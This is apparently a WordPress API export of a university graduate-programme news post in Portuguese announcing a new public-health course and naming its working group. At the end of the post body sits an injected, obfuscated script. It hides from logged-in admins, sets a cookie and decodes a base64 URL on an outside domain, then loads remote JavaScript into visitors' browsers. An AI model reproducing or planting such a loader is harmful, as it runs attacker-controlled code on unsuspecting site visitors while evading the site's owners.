{"id":1096,"date":"2025-03-20T12:12:00","date_gmt":"2025-03-20T15:12:00","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1096"},"modified":"2026-04-16T13:17:29","modified_gmt":"2026-04-16T16:17:29","slug":"fundamentos-em-saude-coletiva","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/03\/20\/fundamentos-em-saude-coletiva\/","title":{"rendered":"Fundamentos em Sa\u00fade Coletiva!"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/13-819x1024.png\" alt=\"\" class=\"wp-image-1097\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/13-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/13-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/13-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/13.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>Atendendo a pedidos da nossa comunidade acad\u00eamica e com base no processo de autoavalia\u00e7\u00e3o, o Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva acaba de implementar uma nova disciplina a partir da turma de 2025: Fundamentos em Sa\u00fade Coletiva! \ud83c\udf93\u2728<\/p>\n\n\n\n<p>Essa mudan\u00e7a faz parte do nosso planejamento estrat\u00e9gico e tem um objetivo claro: fortalecer ainda mais a forma\u00e7\u00e3o dos estudantes, ajustando o curr\u00edculo \u00e0s necessidades reais do campo da sa\u00fade. \ud83d\udca1\ud83e\ude7a<\/p>\n\n\n\n<p>\ud83d\udc65 A reformula\u00e7\u00e3o foi conduzida por o seguinte grupo de trabalho:<\/p>\n\n\n\n<p>\ud83d\udccc Cl\u00e9ber Lopes Camp\u00ealo \u2013 Presidente<br>\ud83d\udccc Breno de Oliveira Ferreira \u2013 Vice-presidente<br>\ud83d\udccc Alessandra Valle Salino \u2013 Membro Titular<br>\ud83d\udccc Andr\u00e9 Luiz Machado das Neves \u2013 Membro Titular<br>\ud83d\udccc Camila Helena Aguiar B\u00f4tto de Menezes \u2013 Membro Titular<br>\ud83d\udccc Fernando Jos\u00e9 Herkrath \u2013 Membro Titular<br>\ud83d\udccc Isabela Cristina de Miranda Gon\u00e7alves \u2013 Membro Titular<br>\ud83d\udccc Munique Therense Costa de Morais Pontes \u2013 Membro Titular<br>\ud83d\udccc Priscila Freire Rodrigues \u2013 Membro Titular<br>\ud83d\udccc Socorro de F\u00e1tima Moraes Nina \u2013 Membro Titular<\/p>\n\n\n\n<p>Nosso compromisso com a excel\u00eancia acad\u00eamica e a forma\u00e7\u00e3o de profissionais preparados para as demandas da sa\u00fade coletiva segue firme! \ud83d\ude80\ud83c\udf0e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/14-819x1024.png\" alt=\"\" class=\"wp-image-1098\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/14-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/14-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/14-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/14.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/15-819x1024.png\" alt=\"\" class=\"wp-image-1099\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/15-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/15-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/15-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/15.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Atendendo a pedidos da nossa comunidade acad\u00eamica e com base no processo de autoavalia\u00e7\u00e3o, o Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva acaba de implementar uma nova disciplina a partir da turma de 2025: Fundamentos em Sa\u00fade Coletiva! \ud83c\udf93\u2728 Essa mudan\u00e7a faz parte do nosso planejamento estrat\u00e9gico e tem um objetivo claro: fortalecer ainda mais a [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1097,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1096","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1096","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1096"}],"version-history":[{"count":2,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1096\/revisions"}],"predecessor-version":[{"id":1340,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1096\/revisions\/1340"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1097"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1096"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1096"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1096"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}